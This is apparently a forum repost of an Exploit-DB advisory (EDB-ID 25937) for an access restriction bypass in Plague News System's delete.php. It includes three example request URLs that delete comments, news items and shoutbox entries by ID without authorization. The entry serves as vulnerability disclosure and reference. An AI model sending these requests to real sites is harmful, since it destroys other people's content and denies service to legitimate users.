- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 25937
- Проверка EDB
-
- Пройдено
- Автор
- EASYEX
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2005-07-04
Код:
source: https://www.securityfocus.com/bid/14139/info
Plague News System is prone to an access restriction bypass vulnerability. The issue exists due to a lack of sanity checks performed by 'delete.php' on deletion requests passed to the script.
A remote attacker may exploit this issue to delete site content and deny service for legitimate users.
http://www.example.com/delete.php?comment=1&id=[ID of comment here]
http://www.example.com/delete.php?news=1&id=[ID of news here]
http://www.example.com/delete.php?shout=1&id=[ID of shout here]- Источник
- www.exploit-db.com
